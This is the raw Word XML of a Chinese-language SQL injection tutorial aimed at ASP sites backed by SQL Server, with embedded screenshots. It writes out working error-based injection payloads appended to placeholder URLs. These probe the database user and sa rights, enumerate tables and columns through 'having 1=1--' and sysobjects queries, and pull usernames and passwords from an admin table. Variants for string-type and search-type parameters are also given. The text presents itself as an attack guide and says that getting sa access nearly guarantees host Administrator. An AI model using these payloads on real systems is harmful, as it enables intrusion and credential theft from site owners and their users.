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9A" w:rsidRDefault="00BF50CB" w:rsidP="000E2C00">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004242EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="004242EE">
        <w:t xml:space="preserve"> user&gt;0</w:t>
      </w:r>
      <w:r w:rsidR="004242EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回错误页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004242EE" w:rsidRDefault="004242EE" w:rsidP="000E2C00">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CC761EE" wp14:editId="394FF621">
            <wp:extent cx="684022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220" cy="1589405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004242EE" w:rsidRDefault="004242EE" w:rsidP="000E2C00">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回用户名为xingsheadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1255F" w:rsidRDefault="00A1255F" w:rsidP="000E2C00">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00815E98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>user 是 SQLServer 的一个内置变量，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它的值是当前连接的用户名，类型为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nvarchar</w:t>
      </w:r>
      <w:r w:rsidR="004F5BC6">
        <w:t>。而这里</w:t>
      </w:r>
      <w:r>
        <w:t>拿一个 nvarchar 的值跟 int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 比较，系统会先试图将 nvarchar 的值转成 int 型，当然，转的过程中肯定会出错，SQLServer 的出错提示是：将 nvarchar 值“abc” 转换数据类型为 int 的列时发生语法错</w:t>
      </w:r>
      <w:r w:rsidR="00D74744">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>误，</w:t>
      </w:r>
      <w:r>
        <w:t>abc 正是变量 user 的值，这样，不废吹灰之力就拿到了数据库的用户名。还有</w:t>
      </w:r>
      <w:r w:rsidR="00D93777">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLServer 数据库里的用户 sa 是个等同 Adminstrators 权限的角色，拿到了 sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限，几乎肯定可以拿到主机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Administrator </w:t>
      </w:r>
      <w:r w:rsidR="00F97E52">
        <w:t>了。而</w:t>
      </w:r>
      <w:r>
        <w:t>上面的方法可以很方便的测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出是否是用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sa 登录，如果是 sa 登录，那么返回的错误提示是将”dbo”转换成 int 的列发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生错误，而不是”</w:t>
      </w:r>
      <w:r>
        <w:t>sa”，</w:t>
      </w:r>
      <w:r w:rsidR="00815E98" w:rsidRPr="00815E98">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815E98">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A774B39" wp14:editId="6FE69E86">
            <wp:extent cx="6840220" cy="2801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2801620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1255F" w:rsidRDefault="00BF50CB" w:rsidP="000E2C00">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="005B5CF4" w:rsidRPr="005B5CF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询当前用户的数据信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B5CF4" w:rsidRDefault="00BF50CB" w:rsidP="000E2C00">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00735E73">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rsidR="005B5CF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="005B5CF4">
        <w:t xml:space="preserve"> having 1=1--就可以</w:t>
      </w:r>
      <w:r w:rsidR="00206CDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到用户数据信息了。</w:t>
      </w:r>
      <w:r w:rsidR="005B5CF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r w:rsidR="005B5CF4">
        <w:t xml:space="preserve"> http://www.xxx.com/xxx.asp?id=xx having 1=1--即可，</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DC45AD2" wp14:editId="473DA56B">
            <wp:extent cx="6840220" cy="1221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1221740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="005B5CF4">
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidR="006A7851">
        <w:t>FORUM_TOPICS.TOPIC_ID</w:t>
      </w:r>
      <w:r w:rsidR="005B5CF4">
        <w:t>就是当前用户的数据信息了。</w:t>
      </w:r>
      <w:r w:rsidR="006A7851">
        <w:t>FORUM_TOPICS</w:t>
      </w:r>
      <w:r w:rsidR="005B5CF4">
        <w:t>是表名，而</w:t>
      </w:r>
      <w:r w:rsidR="006A7851">
        <w:t>TOPIC_ID</w:t>
      </w:r>
      <w:r w:rsidR="005B5CF4">
        <w:t>为列名。</w:t>
      </w:r>
      <w:r w:rsidR="00707E18">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续猜解用户</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据信息，不过这里的语句稍</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>微有点变化，改成了</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5">
        <w:t>group by</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>用户信息</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5">
        <w:t>having 1= 1--</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>我们继续提交http://www.xxx.com/xxx.asp?id=xx group by FOR</w:t>
      </w:r>
      <w:r w:rsidR="003D28F3">
        <w:t>UM_TOPICS.TOPIC_ID having 1=1--</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可得到一个</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5">
        <w:t>T_SUBJECT</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>列名</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F052B36" wp14:editId="48847C4D">
            <wp:extent cx="6840220" cy="11976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1197610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>继续提交数据，不过这个时候我们已经有</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了两个列名了，所以提交的数据又有一点变化，为</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5">
        <w:t>group by</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>用户信息 1,用户信息</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5">
        <w:t>2 h</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>aving1=1--。我们提交</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5" w:rsidRPr="00695BF5">
        <w:t>http://www.xxx.com/xxx.asp?id=xx</w:t>
      </w:r>
      <w:r w:rsidR="00695BF5">
        <w:t xml:space="preserve"> group by </w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>FORUM_TOPICS.TOPIC_ID ,FORUM_TOPICS.T_SUBJECT having 1=1--就可以得到其他的列名了。上面的的方法的原理</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是在</w:t>
      </w:r>
      <w:r w:rsidR="006A7851">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>语句中，having 1=1--是与</w:t>
      </w:r>
      <w:r w:rsidR="006A7851">
        <w:t>group by</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:t>结合使用并进行条件判断的，如果语句不完整，</w:t>
      </w:r>
      <w:r w:rsidR="0054189A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库就会返回错误信息，并显示一个表名和一个列名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735E73" w:rsidRDefault="00735E73" w:rsidP="000E2C00">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00564DA4" w:rsidRDefault="00B0635A" w:rsidP="000E2C00">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00735E73">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rsidR="00564DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的方法只能暴当前表中的列，下面的方法</w:t>
      </w:r>
      <w:r w:rsidR="00CD5D81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以暴任意表名和列名，</w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关语句为：</w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:t>and (select top 1 name from (select top N id,name from</w:t>
      </w:r>
      <w:r w:rsidR="002B6FB8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:t>sysobjects where xtype=char(85)) T order by id desc)&gt;1。其中N就是代表数据库中的第N个表，</w:t>
      </w:r>
      <w:r w:rsidR="00C645A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里</w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:t>http://www.xxx.com/xxx.asp?id=xx and (select top 1 name from (select top</w:t>
      </w:r>
      <w:r w:rsidR="00D61F8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:t>1 id,name from sysobjects where xtype=</w:t>
      </w:r>
      <w:r w:rsidR="00AE5367">
        <w:t>char(85)) T order by id desc)&gt;1</w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:t>就可以猜解第一个表的</w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名为</w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:t>D99_REG</w:t>
      </w:r>
      <w:r w:rsidR="003225BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006B1986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17AE33F7" wp14:editId="230F8405">
            <wp:extent cx="6840220" cy="11036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103630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006B1986">
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidR="00564DA4">
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidR="006B1986">
        <w:t>http:/</w:t>
      </w:r>
      <w:r w:rsidR="0059477D">
        <w:t>/www.xxx.com/xxx.asp?id=xx an</w:t>
      </w:r>
      <w:r w:rsidR="006B1986">
        <w:t>d(select top 1 name from (select top 2 id,name from sysobjects where xtype=char(85</w:t>
      </w:r>
      <w:r w:rsidR="006B1986" w:rsidRPr="006B1986">
        <w:t>)) T order by id</w:t>
      </w:r>
      <w:r w:rsidR="006B1986">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC720A">
        <w:t>desc)&gt;1</w:t>
      </w:r>
      <w:r w:rsidR="006B1986" w:rsidRPr="006B1986">
        <w:t>就可以猜解到第二个表名为shit_tmp</w:t>
      </w:r>
      <w:r w:rsidR="00A45D27">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00905ED0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2055A1D9" wp14:editId="3AB1943F">
            <wp:extent cx="6840220" cy="9315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931545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00905ED0" w:rsidRDefault="00905ED0" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要暴任意表中的任意列的语句为：</w:t>
      </w:r>
      <w:r w:rsidR="0059477D">
        <w:t>and (select top 1 co</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l_name(object_id('表名'),N) from </w:t>
      </w:r>
      <w:r w:rsidR="0059477D">
        <w:t>sysobjects)&gt;1</w:t>
      </w:r>
      <w:r>
        <w:t>。这里我们提交http://www.xxx.com/xxx.asp?id=x</w:t>
      </w:r>
      <w:r w:rsidR="0059477D">
        <w:t xml:space="preserve">x and (select top 1 </w:t>
      </w:r>
      <w:r>
        <w:t>col_name(object_id('</w:t>
      </w:r>
      <w:r w:rsidR="008E517F">
        <w:t>D99_REG'),1) from sysobjects)&gt;1</w:t>
      </w:r>
      <w:r>
        <w:t>就可以暴出</w:t>
      </w:r>
      <w:r w:rsidR="0059477D">
        <w:t>D99_REG</w:t>
      </w:r>
      <w:r>
        <w:t>表中的第一个列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名为</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidR="00CE46FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DFDF398" wp14:editId="63BE849A">
            <wp:extent cx="6840220" cy="1211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211580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>提交http://www.x</w:t>
      </w:r>
      <w:r w:rsidR="0059477D">
        <w:t xml:space="preserve">xx.com/xxx.asp?id=xx and (select top 1 </w:t>
      </w:r>
      <w:r>
        <w:t>col_name(object_id('D9</w:t>
      </w:r>
      <w:r w:rsidR="0059477D">
        <w:t>9_REG'),2) fro m sy sobjects)&gt;1</w:t>
      </w:r>
      <w:r>
        <w:t>就可以暴出第二个列名为 Data</w:t>
      </w:r>
      <w:r w:rsidR="00CE46FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00CE46FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A314419" wp14:editId="1E922BE7">
            <wp:extent cx="6840220" cy="11036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103630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE46FD" w:rsidRDefault="00CE46FD" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有列名和表名之后就是要暴出数据库中的数据了，这个命令的相关语句为</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t>(select t</w:t>
      </w:r>
      <w:r>
        <w:t>op 1 列名</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t xml:space="preserve"> fro</w:t>
      </w:r>
      <w:r>
        <w:t>m 表名</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t xml:space="preserve"> where i</w:t>
      </w:r>
      <w:r>
        <w:t>d=N)&gt;1</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>代表第</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>条数据，这里我们提交http://www.xxx.com/xxx.asp?id=xx and (select top 1 us</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t>ername from admin where id=1)&gt;1</w:t>
      </w:r>
      <w:r>
        <w:t>就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r>
        <w:t>以猜解出</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t>表中</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t>的第一条数据了，而提http://www.xxx.com/xxx.asp?id=xx and (select top 1 pa</w:t>
      </w:r>
      <w:r w:rsidR="001651E2">
        <w:t>ssword from admin where id=1)&gt;1</w:t>
      </w:r>
      <w:r>
        <w:t>就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以暴出密码了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00547EFF" w:rsidRDefault="00547EFF" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00547EFF" w:rsidRDefault="00547EFF" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00547EFF">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rsidRPr="00547EFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前</w:t>
      </w:r>
      <w:r w:rsidR="007D77C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>面</w:t>
      </w:r>
      <w:r w:rsidR="007D77C1">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t>的参数都是数字，如h</w:t>
      </w:r>
      <w:r w:rsidR="007D77C1">
        <w:t>ttp://www.xxx.com/xxx.asp?id=xx</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidR="007D77C1">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是等于一个数字的。这种类型的注入攻击，我们直接在这个数字参数后加上注入攻击的代码就可以了。但是并不是所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t xml:space="preserve"> URL 中都是以数字来作为参数，还有很多是用是用字符来作为</w:t>
      </w:r>
      <w:r w:rsidR="006979AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数的</w:t>
      </w:r>
      <w:r w:rsidR="007D77C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以它们</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数又是不一样。若</w:t>
      </w:r>
      <w:r w:rsidR="00CB17BE">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t>中的参数是字符的话，假设其</w:t>
      </w:r>
      <w:r w:rsidR="00CB17BE">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t>地址为http://www.xxx.com/xxx.asp?action=value。这个</w:t>
      </w:r>
      <w:r w:rsidR="00CB17BE">
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t>就是一个字符，那么对于这样的</w:t>
      </w:r>
      <w:r w:rsidR="00CB17BE">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t>我们要进行注入的话，就要输入http://www.xxx.com/xxx.asp?action=value' and 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00F60947">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t>http://www.xxx.co</w:t>
      </w:r>
      <w:r w:rsidR="00F60947">
        <w:t>m/xxx.asp?action=value' and 1=2</w:t>
      </w:r>
      <w:r w:rsidRPr="00547EFF">
        <w:t>来判断是否存在注入漏洞了</w:t>
      </w:r>
      <w:r w:rsidR="00CA3E13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果要</w:t>
      </w:r>
      <w:r w:rsidR="00CA3E13">
        <w:t>进行注入的话，比如判断当前的数据库类型，那就应该输入http://www.xxx.com/xxx.asp?action=value' and user&gt;0。它</w:t>
      </w:r>
      <w:r w:rsidR="00CA3E13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00CA3E13">
        <w:t>数字型注入差不多，但</w:t>
      </w:r>
      <w:r w:rsidR="00CA3E13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是要在字符后面加上一个单引号然后在后面加上所要进行注入攻击的代码，注意的是单引号和注入攻击代码之间要有一个空格。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006979AC" w:rsidRDefault="006979AC" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006979AC" w:rsidRDefault="006979AC" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006979AC">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3"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>④</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有一种是用于搜索功能的，就是搜索型的注入，这个功能是用到了</w:t>
      </w:r>
      <w:r>
        <w:t>SQL语句中的模糊查询功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。一般这个主要用来搜索的，现在很多网站都提供搜索的功能。如果要注入一个网站的搜索，那么就应该输入这样的代码“</w:t>
      </w:r>
      <w:r w:rsidRPr="006979AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>要搜索的关键字</w:t>
      </w:r>
      <w:r w:rsidRPr="006979AC">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%' and 注入攻击代码</w:t>
      </w:r>
      <w:r>
        <w:t>”。例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要注入一个网站的搜索的地方，选的搜索关键字</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>那么就可以这样进行判断是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否存在注入漏洞：</w:t>
      </w:r>
      <w:r>
        <w:t>a' and 1=1和a' and 1=2。有一前提是</w:t>
      </w:r>
      <w:r w:rsidR="00766006">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其</w:t>
      </w:r>
      <w:r>
        <w:t>所要搜索的关键字</w:t>
      </w:r>
      <w:r w:rsidR="003C1CBB">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>必须是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以搜索到信息的，你不要搞一个连网站都搜索不到的关键字就不行。</w:t>
      </w:r>
    </w:p>
